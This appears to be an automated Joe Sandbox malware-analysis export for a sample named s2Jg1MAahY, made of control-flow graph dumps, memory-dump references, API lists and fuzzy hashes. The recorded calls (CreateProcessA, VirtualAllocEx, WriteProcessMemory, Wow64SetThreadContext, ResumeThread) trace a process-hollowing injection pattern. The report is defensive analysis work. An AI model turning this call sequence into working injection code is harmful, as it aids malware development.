                                                                                                                    control_flow_graph 409 7a5ef08-7a5ef9d 411 7a5efd6-7a5eff6 409->411 412 7a5ef9f-7a5efa9 409->412 419 7a5f02f-7a5f05e 411->419 420 7a5eff8-7a5f002 411->420 412->411 413 7a5efab-7a5efad 412->413 414 7a5efd0-7a5efd3 413->414 415 7a5efaf-7a5efb9 413->415 414->411 417 7a5efbd-7a5efcc 415->417 418 7a5efbb 415->418 417->417 421 7a5efce 417->421 418->417 426 7a5f097-7a5f151 CreateProcessA 419->426 427 7a5f060-7a5f06a 419->427 420->419 422 7a5f004-7a5f006 420->422 421->414 424 7a5f029-7a5f02c 422->424 425 7a5f008-7a5f012 422->425 424->419 428 7a5f014 425->428 429 7a5f016-7a5f025 425->429 440 7a5f153-7a5f159 426->440 441 7a5f15a-7a5f1e0 426->441 427->426 431 7a5f06c-7a5f06e 427->431 428->429 429->429 430 7a5f027 429->430 430->424 432 7a5f091-7a5f094 431->432 433 7a5f070-7a5f07a 431->433 432->426 435 7a5f07c 433->435 436 7a5f07e-7a5f08d 433->436 435->436 436->436 438 7a5f08f 436->438 438->432 440->441 451 7a5f1f0-7a5f1f4 441->451 452 7a5f1e2-7a5f1e6 441->452 454 7a5f204-7a5f208 451->454 455 7a5f1f6-7a5f1fa 451->455 452->451 453 7a5f1e8 452->453 453->451 457 7a5f218-7a5f21c 454->457 458 7a5f20a-7a5f20e 454->458 455->454 456 7a5f1fc 455->456 456->454 460 7a5f22e-7a5f235 457->460 461 7a5f21e-7a5f224 457->461 458->457 459 7a5f210 458->459 459->457 462 7a5f237-7a5f246 460->462 463 7a5f24c 460->463 461->460 462->463
                                                                                                                    APIs
                                                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A5F13E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1782159523.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7a50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 963392458-0
                                                                                                                    • Opcode ID: efb8b2a45d998b6795b51573e846b1abee61d7ce217e6c235e9d03d7b93911e0
                                                                                                                    • Instruction ID: 42f08d5aae796b137e61e153c30bad3ae750c462b7ad9a9f6230cb62d9c77b36
                                                                                                                    • Opcode Fuzzy Hash: efb8b2a45d998b6795b51573e846b1abee61d7ce217e6c235e9d03d7b93911e0
                                                                                                                    • Instruction Fuzzy Hash: 0C916FB1D0021ADFDF14DF69C841BDEBBB2BF84310F148569E819A7240EB749985CF92

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 465 143ad68-143ad77 467 143ada3-143ada7 465->467 468 143ad79-143ad86 call 143a08c 465->468 469 143adbb-143adfc 467->469 470 143ada9-143adb3 467->470 473 143ad88 468->473 474 143ad9c 468->474 477 143ae09-143ae17 469->477 478 143adfe-143ae06 469->478 470->469 525 143ad8e call 143aff0 473->525 526 143ad8e call 143b000 473->526 474->467 480 143ae3b-143ae3d 477->480 481 143ae19-143ae1e 477->481 478->477 479 143ad94-143ad96 479->474 484 143aed8-143af52 479->484 485 143ae40-143ae47 480->485 482 143ae20-143ae27 call 143a098 481->482 483 143ae29 481->483 489 143ae2b-143ae39 482->489 483->489 516 143af55-143af7e 484->516 517 143af54 484->517 487 143ae54-143ae5b 485->487 488 143ae49-143ae51 485->488 491 143ae68-143ae71 call 143a0a8 487->491 492 143ae5d-143ae65 487->492 488->487 489->485 497 143ae73-143ae7b 491->497 498 143ae7e-143ae83 491->498 492->491 497->498 500 143aea1-143aea5 498->500 501 143ae85-143ae8c 498->501 504 143aeab-143aeae 500->504 501->500 502 143ae8e-143ae9e call 143a0b8 call 143a0c8 501->502 502->500 507 143aed1-143aed7 504->507 508 143aeb0-143aece 504->508 508->507 518 143af80-143af98 516->518 517->516 517->518 520 143afa0-143afcb GetModuleHandleW 518->520 521 143af9a-143af9d 518->521 522 143afd4-143afe8 520->522 523 143afcd-143afd3 520->523 521->520 523->522 525->479 526->479
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0143AFBE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1772730114.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1430000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4139908857-0
                                                                                                                    • Opcode ID: 0a0ca727a53163101e710f368362f7b49de6b94b60d1860159a5830ae6d7bc46
                                                                                                                    • Instruction ID: 912e1d7553046d9716e31e08ab33ad0ebf5b154541e8ea214ed30fef390d0bad
                                                                                                                    • Opcode Fuzzy Hash: 0a0ca727a53163101e710f368362f7b49de6b94b60d1860159a5830ae6d7bc46
                                                                                                                    • Instruction Fuzzy Hash: C48144B0A40B058FDB24DF6AC04575ABBF1BF88314F10892ED18AD7A60D775E84ACB90

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 527 14358ed-14358ee 528 14358f1-14358f2 527->528 529 14358f0 527->529 530 14358f5-14359b9 CreateActCtxA 528->530 531 14358f4 528->531 529->528 535 14359c2-1435a1c 530->535 536 14359bb-14359c1 530->536 531->530 532 1435891-14358b9 531->532 537 14358c2-14358e3 532->537 538 14358bb-14358c1 532->538 546 1435a2b-1435a2f 535->546 547 1435a1e-1435a21 535->547 536->535 538->537 548 1435a31-1435a3d 546->548 549 1435a40 546->549 547->546 548->549 551 1435a41 549->551 551->551
                                                                                                                    APIs
                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 014359A9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1772730114.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1430000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Create
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2289755597-0
                                                                                                                    • Opcode ID: bc510fbc07b3cd775dad63b4096577b0e7a9c7658e9ad1b35403d24a19412f58
                                                                                                                    • Instruction ID: 90a0275815d3407e9652928171cfd8936e5798e84c3a59089b14b82dcdc29a55
                                                                                                                    • Opcode Fuzzy Hash: bc510fbc07b3cd775dad63b4096577b0e7a9c7658e9ad1b35403d24a19412f58
                                                                                                                    • Instruction Fuzzy Hash: 5B5100B1D00719CFDB24DFA9C88479EBBF5AF88314F20806AD108AB261D7756946CF91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 552 14344b0-14359b9 CreateActCtxA 555 14359c2-1435a1c 552->555 556 14359bb-14359c1 552->556 563 1435a2b-1435a2f 555->563 564 1435a1e-1435a21 555->564 556->555 565 1435a31-1435a3d 563->565 566 1435a40 563->566 564->563 565->566 568 1435a41 566->568 568->568
                                                                                                                    APIs
                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 014359A9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1772730114.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1430000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Create
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2289755597-0
                                                                                                                    • Opcode ID: 743dc9a82535b2a5c85c197091b350ed2e185e2f75d6f80bb5ff06b502bb6261
                                                                                                                    • Instruction ID: d556661acdef8307391fe6f73580e65c7ac7b13274e27dc099d9e97d27bad4c5
                                                                                                                    • Opcode Fuzzy Hash: 743dc9a82535b2a5c85c197091b350ed2e185e2f75d6f80bb5ff06b502bb6261
                                                                                                                    • Instruction Fuzzy Hash: DD41F0B0C0071DCBDB24DFA9C884B9EBBF5BF88314F20806AD419AB251DB716946CF91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 569 7a5ec80-7a5ecce 571 7a5ecd0-7a5ecdc 569->571 572 7a5ecde-7a5ed1d WriteProcessMemory 569->572 571->572 574 7a5ed26-7a5ed56 572->574 575 7a5ed1f-7a5ed25 572->575 575->574
                                                                                                                    APIs
                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A5ED10
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1782159523.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7a50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3559483778-0
                                                                                                                    • Opcode ID: 7ef139468b6ab3776966ade0c38daa2a442f1522873b5124a35971afc30161e2
                                                                                                                    • Instruction ID: 397b029dc2d2498f53c7b73275a2acacebde83e35ede9d44230a9eb39af24349
                                                                                                                    • Opcode Fuzzy Hash: 7ef139468b6ab3776966ade0c38daa2a442f1522873b5124a35971afc30161e2
                                                                                                                    • Instruction Fuzzy Hash: 452139B1D003499FCB10DFA9C885BDEBBF5FF88310F108429E929A7240C7799954DBA4

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 579 143d23c-143d6e4 DuplicateHandle 581 143d6e6-143d6ec 579->581 582 143d6ed-143d70a 579->582 581->582
                                                                                                                    APIs
                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0143D616,?,?,?,?,?), ref: 0143D6D7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1772730114.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1430000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DuplicateHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3793708945-0
                                                                                                                    • Opcode ID: c77b4c494d1e8982a05163f81fc279b9b7b16192e9fe4a97d214977d5070e832
                                                                                                                    • Instruction ID: 6eccb5b2e0d6cc321e2487dec9c59db61382af69364664ad0db5d69f41fb8330
                                                                                                                    • Opcode Fuzzy Hash: c77b4c494d1e8982a05163f81fc279b9b7b16192e9fe4a97d214977d5070e832
                                                                                                                    • Instruction Fuzzy Hash: 452103B5D002489FDB10CF9AD984ADEBBF8EB48320F10801AE928A3351D374A950DFA4

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 600 7a5ed70-7a5edfd ReadProcessMemory 603 7a5ee06-7a5ee36 600->603 604 7a5edff-7a5ee05 600->604 604->603
                                                                                                                    APIs
                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A5EDF0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1782159523.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7a50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MemoryProcessRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1726664587-0
                                                                                                                    • Opcode ID: 96a7f948e4596df443d53682db561291704ed83e5bcb4648f9bb50375ab21d48
                                                                                                                    • Instruction ID: cbfb92e6d2124734fc5a6d9e8912e5161dbd71e0d183a7174153d1a7603c269b
                                                                                                                    • Opcode Fuzzy Hash: 96a7f948e4596df443d53682db561291704ed83e5bcb4648f9bb50375ab21d48
                                                                                                                    • Instruction Fuzzy Hash: 242128B1C003599FCB10DFAAC845ADEFBF5FF88310F108429E929A7240C7749944DBA4

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 590 7a5eae8-7a5eb33 592 7a5eb35-7a5eb41 590->592 593 7a5eb43-7a5eb73 Wow64SetThreadContext 590->593 592->593 595 7a5eb75-7a5eb7b 593->595 596 7a5eb7c-7a5ebac 593->596 595->596
                                                                                                                    APIs
                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A5EB66
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1782159523.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7a50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 983334009-0
                                                                                                                    • Opcode ID: c62a98e42b8924e2540cf0affba120a81024cb9f50f0f152a43a8e360e05b508
                                                                                                                    • Instruction ID: 3c4641873eeb9d39ed16d780f53b061a9de59f8ba2e6d9ec993ca06fa8517530
                                                                                                                    • Opcode Fuzzy Hash: c62a98e42b8924e2540cf0affba120a81024cb9f50f0f152a43a8e360e05b508
                                                                                                                    • Instruction Fuzzy Hash: E62139B1D043098FDB10DFAAC4457EEBBF4EB88310F148429D519A7241C7789A44CFA4

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 585 143d648-143d6e4 DuplicateHandle 586 143d6e6-143d6ec 585->586 587 143d6ed-143d70a 585->587 586->587
                                                                                                                    APIs
                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0143D616,?,?,?,?,?), ref: 0143D6D7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1772730114.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1430000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DuplicateHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3793708945-0
                                                                                                                    • Opcode ID: 06087c8c376b3e8a1caff180406ad15f6948bc96cc24c628067d127521dd1058
                                                                                                                    • Instruction ID: 6fc9d345c91b617de0e27e699ee46add774cb6e45880603a0ed19b13a4301332
                                                                                                                    • Opcode Fuzzy Hash: 06087c8c376b3e8a1caff180406ad15f6948bc96cc24c628067d127521dd1058
                                                                                                                    • Instruction Fuzzy Hash: 0721E2B5D002099FDB10CFAAD985ADEBBF5FB48320F14841AE969B3350D378A944DF64

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 608 7a52827-7a52829 609 7a527dd-7a527f8 VirtualProtect 608->609 610 7a5282b-7a52835 608->610 613 7a52801-7a52822 609->613 614 7a527fa-7a52800 609->614 611 7a52837-7a52850 610->611 612 7a527b9-7a527d6 610->612 615 7a52857-7a5286c 611->615 616 7a52852 611->616 612->609 614->613 616->615
                                                                                                                    APIs
                                                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 07A527EB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1782159523.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7a50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 544645111-0
                                                                                                                    • Opcode ID: 4a508622da63a68e6bb540792c4a67e4a7ca3397fc78d7a6bc3c9d7abd724d3f
                                                                                                                    • Instruction ID: 139242ac05dd2490e1fa2fa85d63a6b6fff79aff794ef29d63bbdce227a355d5
                                                                                                                    • Opcode Fuzzy Hash: 4a508622da63a68e6bb540792c4a67e4a7ca3397fc78d7a6bc3c9d7abd724d3f
                                                                                                                    • Instruction Fuzzy Hash: 6D113AF6900209AFDB10DF99C8447DEBBF0BB54320F108159E96897290D3359655DB61

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 620 7a52770-7a527f8 VirtualProtect 623 7a52801-7a52822 620->623 624 7a527fa-7a52800 620->624 624->623
                                                                                                                    APIs
                                                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 07A527EB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1782159523.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7a50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 544645111-0
                                                                                                                    • Opcode ID: f648dc34127a23f8e217ec339117639fce783fc0ae4481a632e68d5c87d38391
                                                                                                                    • Instruction ID: dc86f221133438c7eaf713b7ea100b764a8feef14e7b42ab9cf2de8e34347e1c
                                                                                                                    • Opcode Fuzzy Hash: f648dc34127a23f8e217ec339117639fce783fc0ae4481a632e68d5c87d38391
                                                                                                                    • Instruction Fuzzy Hash: 1D21C7B59002499FDB10DF9AC584BDEFBF4FB48310F10846AE868A7251D774A644CFA5
                                                                                                                    APIs
                                                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 07A527EB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1782159523.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7a50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 544645111-0
                                                                                                                    • Opcode ID: cdaae5c33be89311e97a8e270941f21e5e546cf0e8a45870369d14011c84a743
                                                                                                                    • Instruction ID: 3ca5c020807fd37f9c10f322a6722cd020b5009ef105c82b3e6a0d4a6680756d
                                                                                                                    • Opcode Fuzzy Hash: cdaae5c33be89311e97a8e270941f21e5e546cf0e8a45870369d14011c84a743
                                                                                                                    • Instruction Fuzzy Hash: D821E4B59002499FCB10DF9AC985BDEFBF4FB48320F108429E968A7251D378A644CFA5
                                                                                                                    APIs
                                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A5EC2E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1782159523.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7a50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4275171209-0
                                                                                                                    • Opcode ID: 304525f627566ba0781fa4548498ebbb38934df5dc8a69ef89f8e514a37500cf
                                                                                                                    • Instruction ID: b2e88626a71a4dff4d85510f2586bd739172e6b8949cd74669812d0907a36e3c
                                                                                                                    • Opcode Fuzzy Hash: 304525f627566ba0781fa4548498ebbb38934df5dc8a69ef89f8e514a37500cf
                                                                                                                    • Instruction Fuzzy Hash: 381167B18003499FCB10DFAAC845ADFBFF5EF88320F208819E529A7250C775A940CFA0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1782159523.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7a50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ResumeThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 947044025-0
                                                                                                                    • Opcode ID: e6a441fd29339373320911bd9b21bdb8f721cf869cca2d4882e86a04b6d5ff74
                                                                                                                    • Instruction ID: 4048fb4a8f0123243b5a7d302b410f49832ee911f2490b7ed330ae01b34e32f5
                                                                                                                    • Opcode Fuzzy Hash: e6a441fd29339373320911bd9b21bdb8f721cf869cca2d4882e86a04b6d5ff74
                                                                                                                    • Instruction Fuzzy Hash: 831136B1D043498FDB24DFAAC4457DEFBF5EB88324F208819D529A7240CB75A944CBA4
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0143AFBE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1772730114.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1430000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4139908857-0
                                                                                                                    • Opcode ID: c7dc2537df40bea031f128fe46344ec46b2b7b176590c461f09ac99ef0658bab
                                                                                                                    • Instruction ID: 9377b5e0e6086bd51ac87782d3cdf853bcb99f7e5787d35da571018a7e54a979
                                                                                                                    • Opcode Fuzzy Hash: c7dc2537df40bea031f128fe46344ec46b2b7b176590c461f09ac99ef0658bab
                                                                                                                    • Instruction Fuzzy Hash: 281110B5C003498FDB14CF9AC444ADEFBF4EB88324F20841AD469A7650C379A545CFA1
                                                                                                                    APIs
                                                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 0ED52195
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1784016502.000000000ED50000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ED50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_ed50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 410705778-0
                                                                                                                    • Opcode ID: a16cb467d9b52e8e6667832c9194e2b35592b2c4fd80f9f4250f8fbde0b9857d
                                                                                                                    • Instruction ID: c5ac5fff3bbb8dcf02be931ef0f90578fc1750da2b81c7c0f0ac876b3af514c3
                                                                                                                    • Opcode Fuzzy Hash: a16cb467d9b52e8e6667832c9194e2b35592b2c4fd80f9f4250f8fbde0b9857d
                                                                                                                    • Instruction Fuzzy Hash: AB1103B58003489FDB10DF9AC949BDEBBF8FB48320F10881AE918A7350C375A944CFA1
                                                                                                                    APIs
                                                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 0ED52195
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1784016502.000000000ED50000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ED50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_ed50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 410705778-0
                                                                                                                    • Opcode ID: e007eb97ab635b3251c98d375136feb3ed64d664b1d9091b0d54928fbb253788
                                                                                                                    • Instruction ID: c355fc474992b494462f748ddf90c7dd9fe97d5e5e81f5117a00fefb8ca6747e
                                                                                                                    • Opcode Fuzzy Hash: e007eb97ab635b3251c98d375136feb3ed64d664b1d9091b0d54928fbb253788
                                                                                                                    • Instruction Fuzzy Hash: 0D11D0B58003499FDB10DF9AC989BDEBBF8EB48320F10845AE918A7350C375A944CFA5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1772043101.000000000119D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0119D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_119d000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c6258f7f35b9caf66dca640499a6a64578e6b38822ca6dcb05e29976b43e7aae
                                                                                                                    • Instruction ID: 2d72cdc98fa30ed87184012abe90959ffa08c13409e26f51caaff813454c7daf
                                                                                                                    • Opcode Fuzzy Hash: c6258f7f35b9caf66dca640499a6a64578e6b38822ca6dcb05e29976b43e7aae
                                                                                                                    • Instruction Fuzzy Hash: 6A216AB1504200DFDF09DF48E9C0B66BF65FB94324F20C56CD90A0B646C336E416C7A2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1772108970.00000000011AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011AD000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_11ad000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7be04e34e87ed125c21786a7fb821b4b10cd9d2816f3402c5505fa15fb954023
                                                                                                                    • Instruction ID: 461612445a92c6a11800a291085dfcf3a53f1d6cf0fa157dcda0e87b35505e97
                                                                                                                    • Opcode Fuzzy Hash: 7be04e34e87ed125c21786a7fb821b4b10cd9d2816f3402c5505fa15fb954023
                                                                                                                    • Instruction Fuzzy Hash: 382103B9644600DFCF19DF58EA84B26BFA5EB84314F60C56DD80A4B642C336D407CA62
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1772108970.00000000011AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011AD000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_11ad000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fff0a729a2153b9065f95e4dbd5ee6d40f06ef6b771e25b6c20fde36dd36593c
                                                                                                                    • Instruction ID: 366759620ef6c9370a9be48041ba776dce13687f93805816e4ba7fb2f7192d7c
                                                                                                                    • Opcode Fuzzy Hash: fff0a729a2153b9065f95e4dbd5ee6d40f06ef6b771e25b6c20fde36dd36593c
                                                                                                                    • Instruction Fuzzy Hash: 4C21F879504600DFDF09DF54E5C4B25BFA5FB84324F64C56EE90A4B652C336D406CA62
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1772108970.00000000011AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011AD000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_11ad000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 932b6e8c6673761e49740e92c504f44d8da5ba85834942bf9bda8d36623f0cc7
                                                                                                                    • Instruction ID: 7e9739ec4400d7d9e1d63a107bfe86ec450226539bf51a76a4045e1823679af8
                                                                                                                    • Opcode Fuzzy Hash: 932b6e8c6673761e49740e92c504f44d8da5ba85834942bf9bda8d36623f0cc7
                                                                                                                    • Instruction Fuzzy Hash: 1021C2755487809FCB07CF24D994711BF71EF46214F28C5DAD8498F6A7C33A980ACB62
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1772043101.000000000119D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0119D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_119d000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                    • Instruction ID: b9eb282852be4df01a7203ae96d43a8168476512aece635478c43fac137911ac
                                                                                                                    • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                    • Instruction Fuzzy Hash: 4611DC76504280CFDF06CF44E9C4B56BF72FB84324F24C2A9D9090B656C33AE45ACBA2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1772108970.00000000011AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011AD000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_11ad000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
